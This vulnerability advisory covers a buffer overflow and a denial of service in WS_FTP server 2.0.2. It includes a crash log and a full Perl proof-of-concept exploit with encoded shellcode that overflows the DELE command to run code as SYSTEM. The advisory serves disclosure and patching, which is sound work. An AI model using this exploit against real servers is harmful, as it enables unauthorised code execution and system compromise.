COMMAND

    WS_FTP server 2.0.2

SYSTEMS AFFECTED

    WS_FTP server 2.0.2

PROBLEM

    Following  is  based  on  a  Defcom  Labs  Advisory def-2001-28 by
    Andreas  Junestam  and  Janne   Sarendal.   WS_FTP  server   2.0.2
    contains a buffer overflow which affects the following commands:

        * DELE
        * MDTM
        * MLST
        * MKD
        * RMD
        * RNFR
        * RNTO
        * SIZE
        * STAT
        * XMKD
        * XRMD

    This buffer overflow gives an attacker the ability to run code  on
    the target  with SYSTEM  RIGHTS, due  to the  fact that the server
    runs as a service by default.   This is only valid when logged  in
    as an anonymous user, not an ordinary one.

    The server  also contains  a easy-to-trigger  DOS.   By sending  a
    couple of NULL(0x0)  characters, the WS_FTP  Server will spike  at
    100% CPU.

    All  the  above  mentioned  commands  seems  to  be using the same
    parsing code which suffers from  a buffer overflow.  By  sending a
    command with an argument greater than 478 (474 bytes + new  return
    address)  bytes,  a  buffer  will  overflow  and  the  EIP will be
    overwritten.   A  proof-of-concept  exploit  is  attached  to  the
    advisory, which works against WS_FTP server 2.0.2 running on WIN2K
    (Professional and Server, any SP).

        C:\tools\web>nc -nvv 127.0.0.1 21
        (UNKNOWN) [127.0.0.1] 21 (?) open
        220-helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520)
        220-Tue Jun 19 14:00:21 2001
        220-30 days remaining on evaluation.
        220 helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520)
        user ftp
        331 Password required
        pass ftp
        230 user logged in
        DELE AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        
        Access violation - code c0000005 (first chance)
        eax=000000ea ebx=0067c278 ecx=000000ea edx=00000002 esi=0067c278
        edi=77fca3e0
        eip=41414141 esp=0104df88 ebp=41414141 iopl=0         nv up ei pl zr
        na po nc
        cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000
        efl=00010246

    The exploit:

    #!/usr/local/bin/perl
    #########################################################################
    #
    # WS_FTP Server 2.0.2 DELE proof-of-concept exploit
    # By andreas@defcom.com and janne@defcom.com (C)2001
    #
    #########################################################################
    $login="ftp";	#username
    $pass="ftp";	#password
    #########################################################################
    $ARGC=@ARGV;
    if ($ARGC !=1) {
	    print "WS_FTP server 2.0.2 DELE proof-of-concept exploit\n";
	    print "It creates a file named defcom.iyd in the c-root\n";
	    print "(C)2001 andreas\@defcom.com\n";
   	    print "Usage: $0 <host>\n";
	    print "Example: $0 127.0.0.1\n";
	    exit;
    }
    use Socket;
    
    my($remote,$port,$iaddr,$paddr,$proto);
    $remote=$ARGV[0];
    $port = "21";
    
    $iaddr = inet_aton($remote) or die "Error: $!";
    $paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
    $proto = getprotobyname('tcp') or die "Error: $!";
    
    socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
    connect(SOCK, $paddr) or die "Error: $!";
    
    sleep(1);
    $msg = "user $login\n";
    send(SOCK, $msg, 0) or die "Cannot send query: $!";
    $msg = "pass $pass\n";
    sleep(1);
    send(SOCK, $msg, 0) or die "Cannot send query: $!";
    $sploit = "\x8b\xd8\x8b\xf8\x83\xc0\x18\x33\xc9\x66\xb9\x42\x81\x66\x81\xf1\x80\x80\x80\x30\x95\x40\xe2\xfa\xde\x1e\x76";
    $sploit = $sploit . "\x1e\x7e\x2e\x95\x6f\x95\x95\xc6\xfd\xd5\x95\x95\x95\x2b\x49\x81\xd0\x95\x6a\x83\x96\x56\x1e\x75\x1e\x7d\xa6\x55";
    $sploit = $sploit . "\xc5\xfd\x15\x95\x95\x95\xff\x97\xc5\xc5\xfd\x95\x95\x95\x85\x14\x52\x59\x94\x95\x95\xc2\x2b\xb1\x80\xd0\x95";
    $sploit = $sploit . "\x6a\x83\xc5\x2b\x6d\x81\xd0\x95\x6a\x83\xa6\x55\xc5\x2b\x85\x83\xd0\x95\x6a\x83";
    $msg = "dele " . $sploit . "\xd4" x (460-length($sploit)) .  "\xf6\xaf\xc9\xf1\xf0\xf3\xf6\xfa\xf8\xbb\xfc\xec\xf1\x95";
    $msg = $msg . "\xab\xa3\x54\x77" . "\xd4" x 16 . "\x8b\xc4\x83\xe8\x7f\x83\xe8\x7f\x83\xe8\x7f\x83\xe8\x71\xff\xe0\n";
    print $msg;
    sleep(1);
    send(SOCK, $msg, 0) or die "Cannot send query: $!";
    exit;

SOLUTION

    Download the new version from:

        http://www.ipswitch.com/Support/WS_FTP-Server/patch-upgrades.html